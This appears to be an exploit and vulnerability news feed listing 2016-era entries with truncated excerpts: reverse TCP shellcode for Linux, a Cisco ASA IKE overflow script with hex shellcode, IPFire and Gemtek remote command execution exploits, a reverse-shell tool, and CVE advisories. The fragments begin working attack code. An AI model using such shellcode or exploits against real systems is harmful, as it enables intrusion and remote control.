Reverse Engineering Cross Platform Disassembler: Panopticon

Reverse Engineering Cross Platform Disassembler Panopticon is a disassembler that understands the semantics of opcodes. This way it’s able to help the user by discovering and displaying invariants that would have to be discovered “by hand” in traditional disassemblers. This allows an interactive...

Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes)

/ Exploit Title: Shellcode Linux x8664 Reverse Shell Date: 19/03/2016 Shellcode Author: Sudhanshu Chauhan LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan Tested on: Ubuntu 14.04.1 x8664 global start start: ;Socket xor rax, rax xor rdi, rdi xor rsi, rsi xor rdx, rdx add rax, 41 add rdi, 2 ad...

Cisco ASA Software 8.x/9.x - IKEv1 / IKEv2 Buffer Overflow

!/usr/bin/env python2.7 import socket import sys import struct import string import random import time Spawns a reverse cisco CLI cliShellcode = "\x60\xc7\x02\x90\x67\xb9\x09\x8b\x45\xf8\x8b\x40\x5c\x8b\x40\x04" "\x8b\x40\x08\x8b\x40\x04\x8b\x00\x85\xc0\x74\x3b\x50\x8b\x40\x08"...

Cisco ASA Software 8.x9.x - IKEv1 IKEv2 Buffer Overflow

Cisco ASA Software 8.x9.x - IKEv1 IKEv2 Buffer Overflow !/usr/bin/env python2.7 import socket import sys import struct import string import random import time Spawns a reverse cisco CLI cliShellcode = "\x60\xc7\x02\x90\x67\xb9\x09\x8b\x45\xf8\x8b\x40\x5c\x8b\x40\x04"...

RSPET - Python Reverse Shell and Post Exploitation Tool

RSPET Reverse Shell and Post Exploitation Tool is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario. Features Remote Command Execution Trafic masking XORed insted of cleartext; for better results use port 4431 Built-in File/Binary transfer both...

Facebook Capture The Flag Platform Open Source

If you’ve been to DEF CON or any number of other technical hacker conferences, you’re familiar with Capture the Flag contests. These events pit teams of hackers and researchers against each other in a series of challenges until a winner is determined. Capture the Flag is also a valuable teaching...

WordPress SOME bug in plupload.flash.swf

WordPress SOME bug in plupload.flash.swf Intro WordPress 4.5.1 is vulnerable against a Same-Origin Method Execution SOME vulnerability that stems from an insecure URL sanitization process performed in the file plupload.flash.swf. The code in the file attempts to remove flashVars ¹ in case they ha...

SOL23073482 - Nginx vulnerabilities CVE-2016-0742, CVE-2016-0746, and CVE-2016-0747

Vulnerability Recommended Actions If you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by upgrading to a version listed in the Versions known to be not vulnerable column. If the table lists only an older version than what you are...

CVE-2016-4555

A NULL pointer dereference flaw was found in the way Squid processes ESI responses. If Squid was used as a reverse proxy or for TLS/HTTPS interception, a malicious server could use this flaw to crash the Squid worker process...

CVE-2016-4554

An input validation flaw was found in Squid's mimegetheaderfield function, which is used to search for headers within HTTP requests. An attacker could send an HTTP request from the client side with specially crafted header Host header that bypasses same-origin security protections, causing Squid...

IPFire 2.19 Core Update 101 - Remote Command Execution

IPFire 2.19 Core Update 101 - Remote Command Execution Exploit Title: IPFire 2.19 Update Core 101 XSS to CSRF to Remote Command Execution Date: 04/05/2016 Author: Yann CAM @ Synetis - ASafety Vendor or Software Link: www.ipfire.org Version: lesser-than 2.19 Core Update 101 Category: Remote Comman...

Linux/x86-64 - Reverse TCP Shellcode (IPv6) (203 bytes)

/ Title : Linux x8664 reverse tcp ipv6 Date : 04-05-2016 Author : Roziul Hasan Khan Shifat Tested on : Ubuntu 14.04 LTS x8664 / / Disassembly of section .text: 0000000000400080 : 400080: 48 31 c0 xor rax,rax 400083: 6a 06 push 0x6 400085: 6a 01 push 0x1 400087: 6a 0a push 0xa 400089: 5f pop rdi...

IPFire < 2.19 Core Update 101 - Remote Command Execution

Exploit for cgi platform in category web applications Exploit Title: IPFire 2.19 Update Core 101 XSS to CSRF to Remote Command Execution Date: 04/05/2016 Author: Yann CAM @ Synetis - ASafety Vendor or Software Link: www.ipfire.org Version: lesser-than 2.19 Core Update 101 Category: Remote Command...

IPFire &lt; 2.19 Core Update 101 - Remote Command Execution

Exploit Title: IPFire 2.19 Update Core 101 XSS to CSRF to Remote Command Execution Date: 04/05/2016 Author: Yann CAM @ Synetis - ASafety Vendor or Software Link: www.ipfire.org Version: lesser-than 2.19 Core Update 101 Category: Remote Command Execution / XSS Google dork: Tested on: IPFire...

Paragon Initiative Enterprises: The Anti-CSRF Library fails to restrict token to a particular IP address when being behind a reverse-proxy/WAF

The Anti-CSRF Library provides the ability to restrict token to a particular IP address using the variable "$hmacip". When "$hmacip" is set to "true", the token is generated using the predefined variable "$SERVER'REMOTEADDR'" which gives the IP address of the client. However, when the web server ...

Automattic: WordPress SOME bug in plupload.flash.swf leading to RCE

Intro == WordPress is vulnerable against a Same-Origin Method Execution SOME vulnerability that stems from an insecure URL sanitization problem performed in the file plupload.flash.swf. The code in the file attempts to remove flashVars ¹ in case they have been set GET parameters but fails to do s...

Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)

Exploit for hardware platform in category web applications This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command...

Gemtek CPE7000 - WLTCS-106 sysconf.cgi Remote Command Execution (Metasploit)

Gemtek CPE7000 - WLTCS-106 sysconf.cgi Remote Command Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated...

Gemtek CPE7000 - WLTCS-106 &#039;sysconf.cgi&#039; Remote Command Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution', 'Description' = %q A vulnerability exists for Gemt...

Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)

/ Title: linux x86 reverse tcp ipv6 Date: 22-04-2016 Exploit Author: Roziul Hasan Khan Shifat Tested on: kali 2.0 and Ubuntu 14.04 LTS Contact: email protected / / section .text global start start: ;;socket xor ebx,ebx mul ebx ;null out eax push byte 6 push byte 0x1 push byte 10 mov ecx,esp mov...